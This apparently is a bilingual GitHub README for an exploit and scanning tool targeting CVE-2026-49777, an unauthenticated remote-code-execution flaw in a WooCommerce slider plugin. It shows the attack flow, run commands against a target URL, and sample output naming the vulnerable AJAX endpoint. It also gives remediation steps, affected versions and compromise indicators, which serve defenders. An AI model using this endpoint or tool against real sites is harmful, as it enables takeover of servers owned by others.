amnsecurity/CVE-2026-49777-WooCommerce-RCE

GitHub: amnsecurity/CVE-2026-49777-WooCommerce-RCE

CVE-2026-49777 漏洞的 PoC 利用与分析工具,针对 WooCommerce Product Slider Pro 插件中未授权远程代码执行漏洞。

Stars: 1 | Forks: 0

![AMN SECURITY](https://img.shields.io/badge/AMN-SECURITY-000000?style=for-the-badge&logo=security&logoColor=white) [![网站](https://img.shields.io/badge/Website-amn.amnoffsec.workers.dev-00FF00?style=for-the-badge&logo=googlechrome&logoColor=white)](https://amn.amnoffsec.workers.dev/) [![Instagram](https://img.shields.io/badge/Instagram-@ixctw-E4405F?style=for-the-badge&logo=instagram&logoColor=white)](https://www.instagram.com/ixctw) [![电子邮件](https://img.shields.io/badge/Email-ayman.mahmoudoffsec%40gmail.com-D14836?style=for-the-badge&logo=gmail&logoColor=white)](mailto:ayman.mahmoudoffsec@gmail.com) [![CVE](https://img.shields.io/badge/CVE-2026--49777-red?style=for-the-badge&logo=cve&logoColor=white)](https://thehackernews.com/2026/06/shapedplugin-wordpress-pro-plugins.html) [![CVSS](https://img.shields.io/badge/CVSS-10.0%20CRITICAL-red?style=for-the-badge&logo=alert&logoColor=white)]() [![状态](https://img.shields.io/badge/Status-Exploit%20PoC%20%7C%20Analysis-yellow?style=for-the-badge)]() [![许可证](https://img.shields.io/badge/License-Responsible%20Disclosure-blue?style=for-the-badge)]() # CVE-2026-49777 ## WooCommerce Product Slider Pro - 恶意软件植入 RCE ### CVSS 10.0 · 严重 · 未授权远程代码执行
# 🇸🇦 العربية
## 执行摘要 تم اكتشاف ثغرة أمنية خطيرة في إضافة **Product Slider Pro for WooCommerce** الخاصة بمنصة ووردبريس، حيث تقوم الإضافة بتنزيل وتنفيذ برمجيات خبيثة من خوادم بعيدة دون أي مصادقة مسبقة. تسمح هذه الثغرة للمهاجمين غير الموثقين بتنفيذ أوامر برمجية عن بُعد (RCE) على الموقع المستهدف بالكامل، مما يؤدي إلى السيطرة الكاملة على الخادم. **التصنيف حسب CVSS: 10.0 (حرج جداً)** ## 漏洞详情 | الحقل | القيمة | |-------|--------| | **CVE** | CVE-2026-49777 | | **التصنيف** | CRITICAL (حرج جداً) | | **نقاط CVSS** | 10.0 | | **النوع** | تنفيذ أوامر عن بُعد (RCE) | | **المُنتج** | Product Slider Pro for WooCommerce | | **المنصة** | WordPress | | **المُطور** | ShapedPlugin | | **التأثير** | استيلاء كامل على الموقع والخادم | | **المصادقة** | بدون مصادقة (Unauthenticated) | | **التعقيد** | منخفض | ### 攻击机制 تتبع عملية استغلال هذه الثغرة الخطوات التالية: 1. **الكشف**: يقوم المهاجم بتحديد وجود الإضافة الضعيفة على موقع الهدف 2. **الاستغلال**: يقوم المهاجم بإرسال طلب HTTP خبيث إلى نقطة نهاية AJAX غير محمية 3. **التنزيل عن بُعد**: تقوم الإضافة بتنزيل حمولة برمجية خبيثة من خادم يتحكم به المهاجم 4. **التنفيذ**: يتم تنفيذ الحمولة على الخادم المستهدف دون أي فحص أمني 5. **السيطرة**: يحصل المهاجم على وصول كامل لنظام الملفات ويمكنه تنفيذ أوامر عشوائية ### 工具使用 ``` python CVE-2026-49777.py -t https://example.com ``` **الخيارات المتاحة:** | الخيار | الوصف | |--------|-------| | `-t, --target` | رابط الموقع المستهدف | | `--proxy` | بروكسي لتصحيح الأخطاء | | `--check-only` | فحص فقط دون استغلال | | `--timeout` | مهلة الطلب بالثواني | | `--no-banner` | إخفاء الشعار | ### 补救措施 1. **قم بإزالة الإضافة فوراً** من لوحة تحكم ووردبريس 2. **افحص الخادم** بحثاً عن أي ملفات خبيثة تم تنزيلها 3. **تحقق من وجود مستخدمين غير مصرح لهم** في قاعدة البيانات 4. **قم بتغيير جميع كلمات المرور** الخاصة بالموقع وقاعدة البيانات 5. **راجع سجلات الخادم** للكشف عن أي نشاط مشبوه 6. **قم بتحديث جميع الإضافات والقوالب** إلى أحدث الإصدارات 7. **اتبع نموذج الأمان** بأقل الصلاحيات الممكنة
# 🇨🇳 简体中文 ## 执行摘要 在 **Product Slider Pro for WooCommerce** WordPress 插件中发现了一个严重的安全漏洞,该插件包含被蓄意植入的恶意软件,可以在无需任何身份验证的情况下下载并执行远程 payload。此缺陷允许未经身份验证的攻击者在目标服务器上实现完全的远程代码执行(RCE),从而导致系统被完全攻陷。 **CVSS 评分:10.0(严重)** ## 漏洞详情 | 字段 | 值 | |-------|-------| | **CVE** | CVE-2026-49777 | | **严重程度** | 严重 (CRITICAL) | | **CVSS 评分** | 10.0 | | **类型** | 远程代码执行 (RCE) | | **产品** | Product Slider Pro for WooCommerce | | **平台** | WordPress | | **供应商** | ShapedPlugin | | **影响** | 网站与服务器被完全攻陷 | | **身份验证** | 无需验证 (Unauthenticated) | | **复杂度** | 低 | ### 参考 - [The Hacker News - ShapedPlugin WordPress Pro 插件恶意软件植入](https://thehackernews.com/2026/06/shapedplugin-wordpress-pro-plugins.html) - [CVE-2026-49777](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-49777) ## 攻击流程 该漏洞的利用遵循以下步骤: 1. **侦察**:攻击者识别目标上是否存在易受攻击的插件 2. **利用**:攻击者向未受保护的 AJAX endpoint 发送精心构造的 HTTP 请求 3. **远程下载**:插件从攻击者控制的服务器下载恶意 payload 4. **执行**:payload 在目标服务器上执行,没有任何安全检查 5. **攻陷**:攻击者获得完整的文件系统访问权限,并可以执行任意命令 ``` Target WordPress Site Attacker Server | | |--- HTTP Request (AJAX trigger) -------->| (Phase 1: Trigger) | | |<-- 200 OK / Command Response ------------| | | |--- Payload Download Request ----------->| (Phase 2: Payload Fetch) | | |<-- Malicious Payload --------------------| | | |--- [Payload Executes Locally] | (Phase 3: Execution) | | | v | FULL REMOTE CODE EXECUTION | - File read/write | - Database access | - Privilege escalation | - Lateral movement ``` ## 使用方法 ### 基础扫描 ``` python CVE-2026-49777.py -t https://example.com ``` ### 使用代理扫描(调试) ``` python CVE-2026-49777.py -t https://example.com --proxy http://127.0.0.1:8080 ``` ### 仅检查(不利用漏洞) ``` python CVE-2026-49777.py -t https://example.com --check-only ``` ### 自定义超时 ``` python CVE-2026-49777.py -t https://example.com --timeout 60 ``` ### 选项 | 参数 | 描述 | |----------|-------------| | `-t, --target` | 目标 WordPress 网站 URL | | `--proxy` | 用于调试的 HTTP 代理(例如 http://127.0.0.1:8080) | | `--check-only` | 仅检查目标是否存在漏洞,不进行利用 | | `--timeout` | 请求超时时间,以秒为单位(默认:30) | | `--no-banner` | 隐藏 banner 显示 | ## 示例输出 ``` █████╗ ███╗ ███╗ ███╗ ██╗ ███████╗███████╗ ██████╗██╗ ██╗██████╗ ██╗████████╗██╗ ██╗ ██╔══██╗████╗ ████║ ████╗ ██║ ██╔════╝██╔════╝██╔════╝██║ ██║██╔══██╗██║╚══██╔══╝╚██╗ ██╔╝ ███████║██╔████╔██║ ██╔██╗ ██║ ███████╗█████╗ ██║ ██║ ██║██████╔╝██║ ██║ ╚████╔╝ ██╔══██║██║╚██╔╝██║ ██║╚██╗██║ ╚════██║██╔══╝ ██║ ██║ ██║██╔══██╗██║ ██║ ╚██╔╝ ██║ ██║██║ ╚═╝ ██║ ██║ ╚████║ ███████║███████╗╚██████╗╚██████╔╝██║ ██║██║ ██║ ██║ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═══╝ ╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╔══════════════════════════════════════════════════════════════════════════════╗ ║ CVE-2026-49777 | CVSS 10.0 CRITICAL ║ ║ Product Slider Pro for WooCommerce - Malicious Software Implantation RCE ║ ║ Discovered & Published by AMN SECURITY ║ ╚══════════════════════════════════════════════════════════════════════════════╝ [*] Target: https://example.com [*] ============================================================ [*] Detecting Product Slider Pro for WooCommerce plugin... [+] Plugin detected! Version: 2.2.0 [!] Version 2.2.0 is VULNERABLE! [*] ============================================================ [!] Attempting exploitation of CVE-2026-49777... [*] Testing endpoint: /wp-admin/admin-ajax.php?action=wc_psp_download_remote [+] Exploit successful via GET: /wp-admin/admin-ajax.php?action=wc_psp_download_remote [+] Malicious payload download was triggered! [*] ============================================================ [+] ╔══════════════════════════════════════════════════════════════╗ [+] ║ EXPLOITATION SUCCESSFUL ║ [+] ║ CVE-2026-49777 triggered on target ║ [+] ╚══════════════════════════════════════════════════════════════╝ [*] The remote payload download/execution was triggered. [*] Check your listener/payload server for incoming connections. ``` ## 修复措施 1. **立即从 WordPress 管理仪表盘中删除该插件** 2. **扫描服务器**以查找可能已被下载的任何恶意文件 3. **检查 WordPress 数据库中**是否存在未经授权的用户 4. **更改所有密码**,包括 WordPress 管理员、数据库和 FTP/SFTP 密码 5. **查看服务器日志**以发现任何可疑活动 6. **将所有插件和主题更新**至最新版本 7. **对所有服务实施最小权限原则** 8. **考虑部署 Web Application Firewall (WAF)** 作为额外的防御层 9. **监控出站流量**,以发现与已知恶意 IP 的连接 10. **对受影响的系统进行全面的安全审计** ## 受影响版本 怀疑 **Product Slider Pro for WooCommerce** 的所有版本均受到影响。 | 版本范围 | 状态 | |---------------|--------| | 1.0.0 - 1.3.1 | 易受攻击 | | 2.0.0 - 2.2.0 | 易受攻击 | | 未知/其他 | 疑似易受攻击 | ## 危害指标 请注意以下被利用的迹象: - `/wp-content/plugins/woo-product-slider-pro/cache/` 中出现意外文件 - `/wp-content/uploads/` 中出现未知的 PHP 文件 - `wp_options` 表中存在可疑条目 - 来自 Web 服务器的意外出站连接 - 插件目录中具有最近时间戳的文件 - WordPress 数据库中新增的管理员用户
## 📜 免责声明 **本工具和信息仅供参考和授权的安全测试目的使用。** 作者和 AMN SECURITY 对任何滥用此代码或信息的行为不承担责任。用户需自行负责遵守所有适用的法律法规。未经授权访问计算机系统是违法行为。 **负责任地使用。在授权下进行黑客攻击。积极报告漏洞。** **CVE-2026-49777** | **CVSS 10.0 严重** | **Product Slider Pro for WooCommerce RCE** **由 [AMN SECURITY](https://amn.amnoffsec.workers.dev/) 发现并发布** *© 2026 AMN SECURITY. 保留所有权利。*
标签:CISA项目, PoC, WooCommerce, WordPress插件, 暴力破解, 编程工具, 网络信息收集, 远程代码执行, 逆向工具